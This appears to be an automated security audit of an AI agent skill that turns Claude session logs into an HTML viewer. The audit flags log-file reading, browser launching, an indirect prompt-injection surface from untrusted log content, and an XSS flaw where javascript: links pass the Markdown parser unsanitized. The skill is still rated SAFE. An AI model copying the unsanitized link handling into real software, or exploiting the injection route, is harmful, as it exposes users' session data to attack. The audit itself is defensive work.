Skills
skills/kenneth-liao/ai-launchpad-marketplace/view-team-session/Gen Agent Trust Hub

view-team-session

Pass

Audited by Gen Agent Trust Hub on Mar 7, 2026

Risk Level: SAFEDATA_EXFILTRATIONCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [DATA_EXFILTRATION]: The script scripts/generate.py scans for and reads JSONL files within ~/.claude/projects/. These log files contain the complete record of user and agent interactions, which may include sensitive information shared during the session.
  • [COMMAND_EXECUTION]: The script uses the webbrowser module to automatically launch the generated HTML file in the user's default browser after processing.
  • [PROMPT_INJECTION]: The skill exhibits an indirect prompt injection surface by rendering untrusted data from session logs into an HTML viewer.
  • Ingestion points: JSONL files located at ~/.claude/projects/*/*.jsonl (referenced in scripts/generate.py).
  • Boundary markers: None; the logic parses and includes all conversation events.
  • Capability inventory: The skill can read local files, create directories and files in the .claude/output/ directory, and launch system processes (browser).
  • Sanitization: The file assets/template.html implements a custom Markdown parser that uses basic HTML escaping but fails to sanitize URL protocols in Markdown links, creating an XSS vulnerability where javascript: URIs can be executed.
Audit Metadata
Risk Level
SAFE
Analyzed
Mar 7, 2026, 02:39 AM